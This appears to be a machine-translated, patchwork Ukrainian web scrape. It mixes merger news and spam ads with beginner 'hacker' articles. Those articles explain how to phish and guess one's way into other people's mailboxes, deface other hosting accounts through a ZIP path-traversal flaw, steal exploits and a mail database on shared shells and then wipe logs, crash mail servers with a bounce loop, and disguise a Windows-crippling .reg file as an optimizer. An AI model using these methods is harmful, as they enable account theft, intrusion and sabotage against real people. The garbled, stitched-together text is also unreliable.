Злиттям АКС і SafeNet в структурному і стратегічному плані не внесе істотних змін в роботу російського дистриб'ютора АКС - компанії «Aладдін». Основні нововведення можуть торкнутися продуктової пропозиції, для розвитку і супроводу якого російський дистрибутор нарощував свій кадровий і технологічний потенціал у кінці 2008 року. Зберігаючи максимальну незалежність від вендора з погляду ведення бізнесу, «Aладдін» в результаті операції очікує появи інноваційних продуктових пропозицій, пов'язаних з припливом інвестицій в дослідну діяльність та інтеграцією з передовими технологіями SafeNet і WatchGuard.

Протягом трьох місяців угода між АКС та Вектор Капітал повинна бути підтверджена радою акціонерів компанії АКС. У випадку, якщо буде прийнято позитивне рішення, інформація про угоду направляється в антимонопольні органи, які розглянуть її законність.

Сайт для риболовів та мисливців .

Сайт для риболовів та мисливців .
Тут можна знайти все, це дуже корисний сайт .
Тут навіть можна створити свою власну сторінку, чи замовити різні снасті для риболовлі чи полювання . Закачати GPS карти і просто карти .Замовити топові журнали по риболовстві і тд...
Мені як веб мастеру сподобався сайт своїм оформленням...
Як я завжди казав що саме головне це зручність і багато функціональність .
Сайт як в основном зроблений на 5-ть.
-"Мабуть не мало за нього виложили"
По більше-б таких сайтів.
Я пораджу всім хто хоч раз був на полюванні чи риболовлі зайти на цей сайт на ньом можна знайти багато чого цікавого !!!
блоги рыболовов,
охота в Украине
рыбалка в Украине,
форум рыболовов,

Як приховати свій IP ? (для новачків)

На форумі часто запитують: «як приховати свій IP?» І їм відповідають: «Ісползовать анонімні проксі!» А як їх використовувати? А ось так: Спочатку потрібно ці проксі де-небудь найдті, потім налаштувати свій браузер на роботу з проксі. Де найдті проксі? та де завгодно! Просто введи в поисковике «Проксі + лист». Або зайди сюди:
http://www.samair.ru/proxy/
Далі налаштовувати браузер: заходиш в СЕРВІС / СВ-ВА ОБОЗРЕВАТЕЛЬ / ПІДКЛЮЧЕННЯ / НАСТРОЙКА і там Відзначивши галочкою ВИКОРИСТОВУВАТИ проксі-сервера (при цьому перевір, щоб використовувати автоматичне ВИЗНАЧЕННЯ налаштувань), далі в полі IP пиши IP сервера, і порт відповідно. Після цього жми ОК і можеш юзать проксі! Тепер перед тим, як з'єднатися з потрібним тобі вузлом твій браузер спочатку з'єднатися з проксі-сервером а потім відправить вже через проксі запит на потрібний тобі ресурс. Інша справа - це вибрати хорошой, швидкий, і анонімний проксі. Для тренування попробуй 195.68.95.209 порт 8080. Досить швидкий і Анонімний-преанонімний.

АЛЕ! Твій IP можна витягнути і через пошту. Щоб приховати IP у листі, так само використовуй проксі, але можна ще й:

1. Відправити анонімно пошту, використовуючи призначені для цього ресурси, наприклад: http://www.mafiamail.ru:8101/, http://tools-on.net/privacy.shtmll, http://anonymouse-master.org/, http://anonym-mail.host.sk/ ще можна пошукати в Яндексі "відправлення анонімної пошти", "Send anonymous mail" Для більшої анонімності можна ще при цьому скористатися Proxy або анонімайзером
2. Скористатися ремейлером, для цього потрібно надіслати листа на поштову адресу, наприклад remailer@replay.com, вказавши на початку тексту рядок "Anon-To: адреса одержувача". Потім повинна йти один порожній рядок і вже потім текст повідомлення. список ремейлеров на http://www.publius.net/rlist.htm
3. Ще можна налаштувати поштовий клієнт на роботу зі звичайним Proxy-сервером, робиться це за допомогою проги HTTPort.
4. Можна використовувати спеціальні програми для відправки анонімної пошти.
5. Так само можна пошукати "Анонімні SMTP сервери" і скористатися одним з них.
Перед тим як анонімно відправити кому-то лист, перевір чи IP-адреса буде приховано, надіславши листа себе.
Все! Тепер тебе ні хто не знайде.
Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.

crack для софта новый warez скачать warez популярная музыка Свежие фильмы

Поради по взлому милов для початківців

Вобщем товаріЩЩі ... хочу повідомити вам 3 ... точніше 4 способи злому скриньки яка-нить користувача. Ці способи описані мною тут спеціально для початківців хакерів, які не можуть придумать что нить серйозне і більш дієве, але котирим дуже треба зламати чию-небудь мило ... єдиний мінус цих способів-це те, що вони расщіпани на тупих користувачів (мається на увазі, що тупой юзер той, чий скриньку ви хочете зламати).
Спосіб Нумер Уно: всім вам добре відомий робот, якому потрібно ваш пароль, щоб він видав вам пароль вашої жертви ... просто пишете листа з заголовком ... ну наприклад ... Новий перевірений спосіб злому мильниць (краще мильниць не писати, поскоку той чол може не правильно зрозуміти і ...) так вот ... продовжуємо ... в писмь пишете. всяку фігню типу: "замість теми листа ви повинні ввести ** № # # @ 2136. ваш пароль *? 932!! Е-мийл вашої жертви (:52-2-9! Ваш Е-мейл (на яке прийде пароль жертви),, ... Отримуючи цей лист робот заглючіт і пошле вам пароль від скриньки жертви "ну і так далі ... головне писати з фантазією та заплутаний ... чтоб здавалося що це все правда ... головне написати що цей спосіб працює в різних місцях і для кожного сервак (Яндекс, меіл і т.д.) пишете адресу робота (це має бути ваш скриньку з розумним назвою типу Robotemail (для більшої переконливості ...))
З.Ы. для способу Нумер Уно: нету тут З.Ы.
Спосіб намбер ту: тупой підбір паролів ... для цього необхідно знати 2 речі: 1 що ваша жертва ооочень тупой юзер або просто лінюху (не плутати з твариною що живе в ... в общем где-то живе) ... 2 хоча б мізерні інфу про юзера, щоб приблизно знати що він міг написати ... але і без цих знань можна вгадати пасворд жертви ...
З.Ы. для способу на намбер ту: самі распростроненние паролі це: 1234567890, 987654321, 11111, 1945 Russia, PAROL, пароль, Password, пассворд та номер телефону користувача ...
Споcоб № Драй: для цього способу треба знати про користувача (чий мил' ви хочете зламати) поподробней ... і діє він струму на меіл ру ... по крайне мере в запропонованому мною варіанті ... ви можете просто гадати відповіді на секретне питання ... і угадайте вірний ... когда нибудь ... але легше скористатися наведеної на меіл ру Чудо-анкетою ... хто там бував знає про що я, а хто ні, так ента анкета виводиться при не правильно введеному відповіді на секретне питання ... там ви пишете все, що ви знаєте про користувача і спеціально виготовлений для цього мил' (приготовлений вами) куди і отошьется пароль користувача.
З.Ы. для способу № Драй: нету тут З.Ы.
Спосіб номер чотири: Кодове назва: Опитування Для тупих юзерів (ОДТЮ) вот тут ви можете писати все, що вам в голову взбредет ... головне щоб це був опитування тобто ви складає какую-нить модерних передісторію, мовляв це опитування створено там для чого нитку, та його результати будуть опубліковані там-то і там-то, можна також написати що це опитування проводиться серед обмеженого числа людей емейли яких вибрав какой-нить супер комп, ну всяке в цьому роді ... головне писати убедительно ... і серед питань ОДТЮ повинен бути секретне питання вашої жертви наприклад:
...
14. Ім'я вашої собаки
...
юзер забуває геть які у нього там питання секретні на мило стоять і радіючи можливості взяти участь в опитуванні ... адже ні кожен день такий випадок випадає (:])... і він відповідає на всі питання (включаючи той що його секретний) і посилає відповідь на ваше мило, яке ви вказали в ОДТЮ ... адреса вашого мила теж повинен модерних ... наприклад Opros.... ru от і все ... легко і просто ... головне щоб фантазія була ...
З.Ы. для питання номер чотири: на просунутих користувачів це не діє недарма він називається Опитування Для тупих юзерів ... хоча іноді навіть у досвідчених користувачів зносить башту при такій можливості ... 98% користувачів пишуть відповіддю на таємне запитання правду ...
З.Ы. загальний: не звертайте уваги на граматичні помилки допущені мною ...

Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.

© Протокол POP3 в Delphi

Привіт усім новачкам ХакЗони. У цій статті я збираюся розповісти про протокол POP3 в Delphi-додатках. Як це відноситься до хаку? - Запитаєте ви. Да по-різному. Можливо, кому-то захочеться написати брутфорс, а кому-то свій власний поштовий клієнт, кто-то просто захоче зрозуміти як працювати з POP3 в Delphi, а кто-то хоче видалити всі повідомлення зі свого вконец разбомбленного скриньки ... Взагалі, застосувань куча.

Отже, почнемо. Користуватися ми будемо компонентом зі сторінки FastNet під назвою TNMPOP3. Як ви вже зрозуміли, цей компонент застосовується для отримання листів від POP3-сервера. Ніяких складностей у поводженні з ним немає, всю роботу Delphi, як зазвичай, виконує за нас. Почнемо.

Підготовка.
Перед прийомом повідомлень потрібно задати значення властивості Host (ім'я поштового сервера або його IP-адреса), а також значення властивостей UserID і Password (ім'я користувача і пароль). Потім потрібно викликати метод Connect, який встановить з'єднання. При невідповідності UserID / Password відбувається генерація подій:
OnAuthenticationFailed (якщо введено неправильний пароль або невідоме серверу ім'я)
OnAuthenticationNeeded (якщо пароль не вказано або в UserID не вказано ім'я користувача)

Якщо ви успішно пріконнектілісь до сервера, то автоматично встановлюється властивість MailCount, що показує кількість повідомлень у вашому (або не вашем) скриньці.

Одержання пошти.
Далі потрібно отримати пошту. Це робиться методом GetMailMessage (N: Integer), де
N - комер повідомлення. Але перед його викликом потрібно встановити властивість DeleteOnRead, що відповідає за видалення прочитаних повідомлень (якщо його значення True, тоді після прочитання листа, повідомлення з сервера видаляється з сервера, якщо FALSE - то немає), а також каталог для вивантаження приєднаних файлів у властивість AttachFilePath ( якщо значення не задано, то файли будуть
розвантажуватися в каталог, з якого виконується програма).
Отже, викликав GetMailMessage. Після цього автоматично встановлюється значення
властивості MailMessage. Воно включає свої власні властивості:
Attachments - імена вкладених файлів
Body - текст листа
From - адреса відправника
Head - заголовок листа
MesageID - унікальний ідентифікатор листа
Subject - тема листа

Практика.
Вот, в принципе и вся теоритическую частина, тому далі я наведу фрагменти програми. Отже, створюємо форму, кладемо на неї NMPOP3, три TEdit (для сервера, ім'я користувача і пароль) і кнопку для початку
з'єднання, до якої пишемо такий обробник OnClick:

NMPOP31.Host: = Edit1.Text;
NMPOP31.UserID: = Edit2.Text;
NMPOP31.Password: = Edit3.Text;
NMPOP31.DeleteOnRead: = FALSE;
NMPOP31.Connect;

Тепер додаємо ще чотири TEdit (для введення номера потрібного листа, для виведення адреси відправника, теми листа і идентификатора листа) і два TMemo (для заголовка і тексту листа). Додамо кнопку, при натисканні якої ми будемо отримувати потрібний лист. До неї пишемо такий обробник:

VAR
N: Integer;
if NMPOP31.MailCount> 0 Then
BEGIN
N: = StrToIntDef (Edit4.Text, -1);
If (NNMPOP31.MailCount) then ShowMessage ( 'Wrong number')
Else
BEGIN
NMPOP31.GetMailMessage (N);
Edit5.Text: = NMPOP31.MailMessage.From;
Edit6.Text: = NMPOP31.MailMessage.Subject;
Edit7.Text: = NMPOP31.MailMessage.MessageID;
Memo1.Lines.Assign (NMPOP31.MailMessage.Head);
Memo1.Lines.Assign (NMPOP31.MailMessage.Body);
End;
End;

Після закінчення роботи потрібно відключитися від сервера, що робиться за допомогою методу Disconnect.

Ну ось, в принципі, і все. Тепер ви можете з успіхом користуватися POP3 в
Delphi.

P.S. Так, я ще про чистку забомбленних скриньок говорив, так вот, лист видаляють
за допомогою методу DeleteMailMessage (N: Integer), яке прибирає повідомлення з номером N з поштового сервера.
Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.

Ховаючи IP свого сайту

Варто розмістити в Мережі інформацію, зачіпають чиї-небудь інтереси, як на адмінів сервак тут же починають кричати СВЕРХУ: "Заберіть цю хрень, поки ми зовсім вас на фиг не закрили!". Подивимося, як можна подгадить любителям наступити на горло чужій пісні, приховуючи від їхніх очей адресу своєї сторінки. Самий звичайний IP адреса можна замаскувати так, що навіть яйцеголових специ з комп'ютерної безпеки будуть довго чесать репи в тяжкой думку, расшіфровивая загогуліну вроде http://ftp:128.03.60.23 @ 3558% 3351% 3040. А що вже казати про простих смертних!

Формати адреси
Отже, кожен IP-шник складається з чотирьох байт (дорога, хочеш я тобі розповім, що таке байт?), Розділених крапками. Наприклад, сайти http://www.chat.ru/ і http://www.geocities.com/ мають адреси 212.24.32.192 і 209.01.224.18 відповідно. Що набирати в браузері: більш зручне символьне ім'я або строку http://212.24.32.192 - справа смаку кожного користувача. Останній спосіб залишає масу можливостей змінити IP своєї сторінки до невпізнання або створити ілюзію звернення зовсім на інший сервер.

Шістнадцятковий трюк
Запустимо програму Calculator зі стандартного набору Windows (хоть что-то юзабельное з виндов) і послідовно перетворимо кожен байт, що входить в адресу, в шістнадцятковому (HEX) значення. Отримаємо D4.18.20.C0 для www.chat.ru і D1.01.E0.12 для www.geocities.com. Тепер можна посилатися на свою сторінку за цим значенням, набираючи в браузері http://0xD4.0x18.0x20.0xC0. Дізнатися IP адреса стало складніше, але ще, як то кажуть, не фонтан: будь-який, хто коли-небудь бачив програми на С або Assembler, відразу здогадається, в чому тут трюк. Кращий спосіб взяти всі чотири байтів D41820C0 і перевести їх у десяткове (DEC) значення. За що одержав числа також можна посилатися на сайт з адресою www.chat.ru: http://3558351040/.

Восьмерічний трюк
Ще один варіант, зазвичай збивають з пантелику навіть матерів сісопов - перевести кожну складову IP адреси не в шістнадцятковому, а в восьмерічное (Oct) значення. Той факт, що число, що починається з 0, трактується програмами як восьмерічное, відомий далеко не всім: адреса http://0324.030.040.0300 дає бажаний результат.

А скільки це буде у відсотках?
Тепер можна поступово ускладнювати отримані адреси, додаючи нові елементи скритності. Відомо, що текстова інформація, що передається браузерами разом з URL, перед посилкою по Мережі піддається деякої обробці. Так, наприклад, всі символи Space (пробіл) замінюються кодом% 20. Те ж саме можна зробити з будь-яким символом свого адреси. Щоб отримати необхідний код цифри, достатньо додати до неї 30. % 33 буде відповідати цифрі 3, а% 30 - 0. Підправив отриманий раніше десятковий адресу. Тепер http://3558% 3351% 3040 також містить посилання на www.chat.ru, хоча виглядає вже досить устрашающе.

Ось де собака порылась!
Наступний рівень складності у благородній справі запутиванія слідів вносить додавання в URL символу @. Стара добра "собака" тут не має ніякого відношення до E-Mail, її роль - передача на сервер Login-A і пароля: якщо сервер містить запароленние каталоги, звертатися до них слід так: http://login:password @ URL. Додавання ж "собаки" до звичайного адресою, яка не має ніякого відношення до секретності, змушує браузер просто ігнорувати все, що передує символу @. Таким чином на сервер www.chat.ru ми можемо потрапити, набравши, наприклад, адреса http://12345435374683434809080 @ 3558351040 або http://ftp:128.03.60.23 @ 3558% 3351% 3040

Головне правильно вибрати ім'я!
Але й це ще не межа: заплутати переслідувачів можуть правильно обрані імена каталогів і файлів на сервері. Назвав свою сторінку 203356.htm або ftp.123.0.12.34.htm, можна збити з пантелику будь-якого: http://12345435374683434809080 @ 3558351040/ftp.123.0.12.34.htm. Нагадаємо, що обмеження на довжину назви файлу або каталогу - 256 символів, що означає можливість конструювання, наприклад, такого монструозного URL: http://12345435374683434809080 @ 3558351040/23232323239200596/3232908576579404323 /
123.htm.

Ховаючись в Рунеті
Якщо є можливість, можна зареєструвати свій домен з ім'ям "чіслітельним", наприклад, 2323.ru або 909093290.com. У зоні RU вже зареєстровані 100.ru або 777.ru. Наплодили в такому домені "цифрових" піддоменів, можна отримати адреси на кшталт: http://121.3434.23.2323.ru/121.223.231.ru/2323.12.89.32.ru/ru.htm.

евакуація автомобілів в Москві

ВВГ компанія пропонує послуги з цілодобової евакуації автомобілів в Москві. Велика кількість евакуаторів, низькі ціни.


В дорозі може трапитися всяке, дзвінок у службу евакуації і замовлення евакуатора - це прохання про допомогу у важку хвилину.
Саме в цю важку хвилину ми виручить Вас гарантовано!
До Вас приїдуть досвідчені водії на нових евакуаторах японського виробництва, дбайливо занурять Ваш автомобіль, оперативно доставлять його в будь-яку точку Москви чи Росії! При навантаженні на евакуатор і подальшої евакуації авто, гарантуємо доставити Вашу машину до місця призначення в цілості й схоронності.
эвакуатор Москва услуги эвакуатора эвакуация авто вызов эвакуатора

Дефейс у пров за допомогою ZIP-архіву

Ця стаття посвещается, тим хто хоче замутити свій хостинг з можливістю на ньому розпаковування ZIP-архівів, або тим хто хоче ломануть хостинг з такою можливістю ;-) У цій статті ви зможете дізнатися про одну дірку за допомогою якої можна закачувати файли і папки в чужі акаунти зі свого =)) Якщо зацікавилися, то читайте далі.
Intro
Усе почалося з ідеї створити чат, доступний з гостьового входу. В якості провайдера був обраний Центральний Телеграф, так як коннект з ним завжди з першого разу і дуже рульная. Даний пров дає 1 Мег під пагу, якщо купити инет карту, що ми і зробили. Далі виявилося, що CGI / ASP / PHP ЕТС. заборонені, можна юзать тільки готові скрипти (які, природно, якістю не вражають). Скрипту чату серед них, звичайно, не було, і ми вирішили заюзать під ці цілі скрипт гостьової книги або форумів. Через деякий час чат був готовий, але, після пари тижнів, було вирішено, що чат зроблений лажово - для входу потрібно зареєструватися у нас, без цього - тільки під ім'ям Guest і т.п. заморочки. Загалом, було необхідно переробляти. У ЦТ класти файли на пагу можно только если у тебя что-то є на рахунку, а у нас (так достоверно и неизвестно почему) зняли останні 15 хвилин, які лежали там спеціально для доступу до паге;). Вирішили не класти грошей на цей рахунок, а зробити все по-новому, з чистого листа, так би мовити. І зробили, все круто і зручно, тільки от встала одна проблемка - як би закинути на старий сайт index.html з посиланням на новий? Доступ-то до старого заборонений! (NivaX: Тут обмовлюся - в старому чаті накопичилося певну кількість заслужених чатлан - класні, перевірені друзі, і дуже захотілося побачити їх на новому сайті) А раз проблемка встала - впору пошукати рішення. І ми стали шукати, як би можна отримати доступ на запис у файли інших ПАГ. Все, довге і нудною Інтро закінчилося. ;)
MAIN
Тепер, власне, про знайденому баге. На пагі ЦТ доступ тільки через веб-інтерфейс: (, а щоб не свіхнуться, качая тучу файлу, придумана там гарна система: пакуешь файлів у ЗИП, кидали ЗИП через веб-інтерфейс, а там є така кнопка - розпакувати. Ось і прийшла ідея , що распаковщік у них, напевно, якийсь кривий-доморощений. Так і виявилося. При перевірці на вошивість було виявлено наступне:
Якщо розпаковує файли вже існують, то вони перезаписувати без запиту;
Архівер все розпаковує зі шляхами;
Мало того, що з шляхами, так шляху ще й не перевіряються на наявність точок і слешей!
Таким чином, з'явилося два способи досягнення мети. Перший, ясний перець, грунтувався на підробці шляхів - створювався каталог з ім'ям з двох символів, в ньому - каталог з ім'ям пагі, на яку передбачалося залити "оновлення":)), а в цю папку вже клали сам файл для заливки. Перший каталог пакували в ЗИП, ЗИП відкривався з HIEW или чего-нить еще, два горезвісних символу в назві папки замінялися на дві точки у всіх місцях, де були знайдені в зіпе. Другий спосіб майже такий же - створювався фото з довгим ім'ям, початок якого потім замінюється на точки і слеші. Наприклад, щоб залити index.html на пагу по імені vaspupkin, створюємо фото:!! _vaspupkin_index.html З необхідним змістом, пакуем в ЗИП, потім в HEX-редакторі змінюємо "!!" на "..", а "_" на "". Кидай, розпаковує, отримуємо результат:)). Звичайно, можна було писАть в будь-який файл, на який є право доступу на запис, але наша мета була інша. Після зміни індексу на старій паге ми заспокоїлися і откаталі пісьмецо админам, щоб пофіксено. Ось, начебто, і все про баге;)
OuTTRo
В общем-то, зародок цієї ідеї прийшов зі світу BBS і Fido, де ми балували підробкою шляхів у *. ZIP-пакетах, розпаковує автоматично. О, це було солодко! :)) Адже BBS і поінти часто під DOS / Windows, а там можна було поправити ім'я файлу на com1/com2 (модем завалений мегамі даних:), prn (принтер, якщо включений, звичайно:), ну і звичайно ж улюблений CON ( висновок прямо в консоль), а код 07h при виведенні в консоль - гнусный спікерний звучок;)). Потім ідея підставити визод на рівень вище в ЗИП, прийшла спочатку до NivaX'у, була виправлена і дороблена, і ось на виході результат. Ну що, допіл пиво?


ЗЫ: На ЦТ цей баг пофіксено після нашого листа, а от якщо знайдеш інших прово з розпаковування архіву - прапор тобі в руки;). І пам'ятай: архів - необозрімое поле діяльності!
Шлях усунення цієї дірки: встановлювати більш свіжу версію ZIP-архіватора.

Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.

Як дістати експлоіти # 2

Ця стаття - невелике доповнення до статті nekd0 "як дістати експлоіти".
Найголовніший облом тут може статися після того, як доступ через ftp звичайним юзером до своєї домашньої директорії виявиться заборонений, а то й зовсім FTP сервера не буде.
Доведеться ручками лазить по директоріями, що з боку буде виглядати досить маразматічно. Можна спробувати пошукати файли за шаблоном у юзерскіх директоріях. Наприклад, за допомогою Locate і Find.
До речі, на Шелл існує така противная штука, як таймаут, тобто якщо нічого не робиш протягом певного часу (звичайно 2-5мин.), То сервер сам розриває з тобою з'єднання, а отже, процес пошуку теж автоматично вбиває. Так що потрібно надсилати процес в бекграунд з допомогою символу & наприкінці команди. Процес тоді буде працювати навіть після того, як ти вийшов з Шеллі. Але результати мають відображатися на екрані, а якщо ти вийшов, то природно, нічого не відобразиться. Отже, потрібно записувати результати у файл. На всяк випадок создешь в Хом директории какой-нибудь log.txt за допомогою команди touch log.txt. У підсумку команди повинні виглядати так:
CD ~
touch log.txt
Find / Home-Name *. C>> ~ / log.txt &
Можна теж саме, але з допомогою Locate.
Якщо хто не знав, Тильда - це домашня директорія.
Але адмін може зняти атрибути з Find і Locate, тоді за запитом вони тобі будуть видавати всі файли та директорії, до яких у тебе є доступ. Файлік вийде відповідного розміру. Потім вже можеш розсортувати цей файл простим grep'ом. Отож, у підсумку цих мук ти побачиш теці з експлоітамі. Хоча це може бути і my_first_program.c, що виводять Hello, World! =). А деякі залишають тільки скомпіленние проги без исходников. Їх ти вже без всяких приколів используешь на свій страх і ризик! До речі, не недо вандальнічать в цих директоріях. Юзер адже може інколи оновлювати свою колекцію ...
Також трапляються деякі екземпляри користувачів, які ставлять на свою директорію 700 біт, тобто доступ до папки дозволений тільки власнику. А деякі ставлять взагалі нульовою, то есть доступ заборонений для всіх. Потрапити в такі директорії - саме солодке, хоча деякі ставлять такі біти просто для прикол.
На Шелл провайдерів, особливо на безкоштовних, лежить багато local root exploit'в, адмін на них поступово починає забивати, особливо якщо на сервак зар кілька тисяч користувачів. Рута систему всі, кому не ліньки, можеш і ти теж за компанію ... З нульовим уідом ти облазив всі папки та почернешь для себе багато корисної інформації, наприклад базу з мильнікамі. Не забудь Логи Почистіть, або просто проксі пользуйся, врядли тебе админ тоді наченет обчислювати, якщо ти ніего такого не сделал.А якщо навіть Шелл отнимут - не біда, новий зар.
Але все було б це добре, але от якщо навіть телнета немає. Наприклад Хостер какой-нибудь. Всі собі телнет зар, а у тебе зайвих 10 баксів не знайшлося. Загалом ситуація така, що у всіх є телнет, а у тебе тільки місце під сторінку з виконанням CGI-сценаріїв. Ftp, звичайно має бути, але там вже точно доступ тільки в свою дірекуторію. Що ж, теж непогано. Можеш лазити по директорія з правами
веб-сервера. Як? Є така штука web shell. Вона дозволяє виконувати команди через Web. Навіть якщо на директоріях користувачів коштує 700 біт, сервер туди все одно пролезет (скрипти ж йому потрібно виконувати). Повторювати всі описані вище дії, архівіруешь, зливають по вебу через проксі яким-небудь FlashGet'ом. Але учті, адмін буде не в захваті, побачивши у тебе такий сценарій ... Так що шифруються.
Да не помітить тебе Root:)

P.S. Скрипт цей дати не можу - сам шукаю ...

Хакерство, книги хакерства, як стать хакером, взлом почти.

Як дістати експлоіти.

Ось просканіл ти сервак свого кровного ворога і бачиш, що у нього стоїть на 21 порту WU-ftpd v2.6.2 (к примеру). Ти рад до втрати тому що знаєш, що цей сервак можна поиметь через FTP порт. Але де дістати експлоіт під цю вразливість? Так, раніше мене теж мучали це питання, але зараз я знаю величезна безліч способів їх дістати абсолютно безкоштовно, може бути навіть приватні отримати.
Спосіб перший (найвідоміший): йдеш на який-небудь західний Хак-сайт і вводити в поле пошуку те, що тобі потрібно заексплойтіть. Тут тобі відразу вискакує безліч посилань, а ти вже потрудились знайти серед них те, що тобі потрібно.
Шукати сплоіти тут:
www.packetstormsecurity.nl
www.hac1k.co.za
www.sнcurityfocus.com
www.mazzzafaka.ru

Спосіб другий (менш популярний): Ти йдеш на відомі
трейдерські канали і клянчішь там чего-нить, а може і
сам трейд якщо є чим. Але тут треба добре по
англійської парить, адже там тільки по англійськи
можна.
Заходи сюди: # darknet
#! mafianet

Спосіб передостанній: якщо ти сидиш під виндой, то тебе
приходиться, перед тим як ломануть сервак, закачати на
Шелл експлоіт і скомпіліть його. Дійшло? Все геніальне --
просто. Хіба ти один такий супер хакер? Наверное кто-то
крім тебе на Шелл теж тусуіться, чатітся, сервак кладе.
Можна і у нього сплоітов запозичити. Береш звичайний FTP
клієнт, налаштовувати з'єднання до Шеллі на свій акаунт,
а потім просто ЛАЗу по директоріях і шарішь на наявність
файлу з розширенням. C,. PL і ETC). Звичайно спосіб не дуже
продуктивний, відсотків 70, а то і 80 всього скаченого
виявляється сміттям, а ось решта 20 сплоітамі, причому
реальними. Ти скажеш: як я за допомогою FTP попаду не до себе в
діру? Дуже просто. На сервак, що надають Шеллі
можна побачити навіть / с юідом звичайного юзверя.
А якщо там админ че напутал, то може удасться утащила і
ETC / passwd.

Спосіб останній (самий важкий): сам напиши сплоіт.
Не получиться? А ти пробував? Ні? Ось і спробуй!

Удачи.
Хакерство, книги хакерства, як стать хакером, взлом почти.

Вішаємо сервак

Вам всем знаком протокол SMTP - для пересилання пошти. Іноді, відправляючи повідомлення на адресу і зробивши помилку, ви отримували відповідь від сервера з позначкою, що лист доставити не вдалося. Здавалося б, абсолютно нормальна річ. Але ... тут я трохи піду від пояснень принципу роботи sendmail'a і звернуся до оптичної фізики. Коли в стержні лазера утворюється Квант, летить строго паралельно оптичної осі, скажімо, рубінового стержня, то стикаючись з атомами цього стрижня Квант буде вибивати з них інші кванти, що летів строго паралельно йому. Долетить до одного дзеркала, кванти відображаються і летять назад, нарощуючи свій число в геометричній прогресу. Кванти долітали до другого дзеркала, відображаються ... процес повторюється.

Коли ми відправляємо з адреси non_existent@test1.com листа на адресу non_existent@test2.com sendmail на сервері test2.com бачить, що лист не може бути прийняте (такого користувача немає і в помине) і відсилає лист обрати, додавши туди повідомлення про дату , часу помилки USER NOT FOUND. Лист повертається на домен test1.com, обростає додатковою інформацією ... процес повторюється

Коли кількість квантів, що носять туди-сюди досягає критичного межі, то у пучка в сукупності набирається достатньо потужності, щоб "вискочити" за напівпрозоре дзеркало і зробити корисну роботу - пробити отвір у мікроподшіпніке або ж спалити ворожий космічний корабель.

Коли об'єм листа зростає настільки, що, ходячи між test1.com і test2.com на його передачу йде левова частка наявного bandwidth'a, один з серверів не витримує навантаження і падає. Я особисто спостерігав за процесом, як пінг до одного з доменів збільшувався, збільшувався ... поки не почався суцільний timed out.

У випадку електротехніки, ми маємо абревіатуру Light Amplification by the Stimulated Emission of Radiation. (Усліеніе світла в результаті вимушеного випромінювання), що і читається як LASER. У випадку IP-мереж ми маємо так само типовий лазер з робочим тілом у вигляді каналу, квантами у вигляді листа і дзеркалами в особі test1.com & test2.com.Только енергія використовується не на благо партії, а на те, щоб звалити сервер. Або обидва. А тепер - сценарій у дії:

$ Telnet some.mailserver.com 25

220 ESMTP (Sendmail 8.8.9) Ready
HELO www.test1.com
250 OK
MAIL FROM: non_existent@test1.com
250 user non_existent OK
RCPT TO: non_existent@test2.com
250 reciptient non_existent OK
DATA
354 Send data. End with CRLF.CRLF
blah


QUIT
Хакерство, книги хакерства, як стать хакером, взлом почти.

Глюкан Вікно

Я незабаром угадай у вас є сусід, який працює на вікнах або в вашому универе або школі, буде кватирки.
Якщо бути те, що Я думаю, що Ви цікавий погляд на реакцію удрученную, коли з винды почнуть зникати свої стандартні компоненти.
Ви напевно знаєте такий фішку як реєстр, так що тут це відкриває нам багато можливостей в установці кватирок.
Тиснемо Нашу улюблену кнопку Пуск знаходимо там пункт "Виконати" і пишемо "Regedit".
Ніяке спеціально для такого хто боїться цю команду або щоб Ви не спалили можливий, потрібно створити типо файлік kill.reg Але в нього записати

REGEDIT4

[HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionPoliciesExplorer]
"NoChangeStartMenu" = DWORD: 1
"NoClose" = DWORD: 1
"NoCommonGroups" = DWORD: 1
"NoFavoritesMenu" = DWORD: 1
"NoFind" = DWORD: 1
"NoRecentDocsMenu" = DWORD: 1
"NoRun" = DWORD: 1
"NoSMHelp" = DWORD: 1
"NoSMMyDocs" = DWORD: 1
"NoSetFolders" = DWORD: 1
"NoSetActiveDesktop" = DWORD: 1
"NoSetTaskbar" = DWORD: 1
"NoTrayContextMenu" = DWORD: 1
"NoDesktop" = DWORD: 1

Після створення файлу готового Ви просто клацає на його 2 рази.
Як впарить Чи є: у пошті, щоб послати як пачілку на який або приводить на дискету і говорити, що цей тип регістратура оптимізатора, але якщо поруч з Вами гарна пам'ять, яка є простою, щоб запам'ятати пар цих рядків.
Так тут - якщо за пару пляшок пива Вас попросять оживити винду, що все, Все що вам потрібно зделать це, змінити одинички в нулики і на початку змінених файлік! І залізку переребутіть але тільки не чарівною кнопкою в тілі а по человечески (Завершити сеанс користувача).

Хакурство, книги хакерства, як стать хакером, взлом почти.

А ти записався в хакери?

Хто такий хакер? Можна знайти купу визначень для терміну "хакер", більшість з яких пов'язане з технічною компетентністю та задоволенням, одержуваних від вирішення проблем та подолання перешкод. Але якщо ж ви хочете знати, як стати хакером, то дійсно істотними є два аспекти.
Имеется некоторое сообщество, некая общая культура, яка складається із досвідчених програмістів та мережевих чарівників, яка в свою чергу веде свою історію від перших мінікомп'ютер з поділом часу і від самих ранніх експериментів з мережею ARPANET. Члени цієї культури і дали народження терміну "хакер". Хакери побудували Internet. Хакери зробили операційну систему Unix тим, чим вона є сьогодні. Хакери ведуть Usenet. Хакери забезпечують роботу World Wide Web. Якщо ви є частиною цієї культури, якщо ви внесли в неї свій внесок, і інші члени цієї культури знають - хто ви і називають вас хакером, то ви - хакер.
Хакерська погляд на світ не обмежується лише культурою хакерів-програмістів. Є люди, які застосовують Хакерська підхід і до інших речей, на кшталт електроніки або музики. В дійсності, ви можете зустрітися з цим підходом на вищих рівнях будь-якої науки чи мистецтва. Софтверні хакери визнають таких близьких за духом людей і теж можуть називати їх "хакерами", деякі навіть проголошують, що Хакерська природа на самом деле не залежить від середовища, в якому працює хакер.
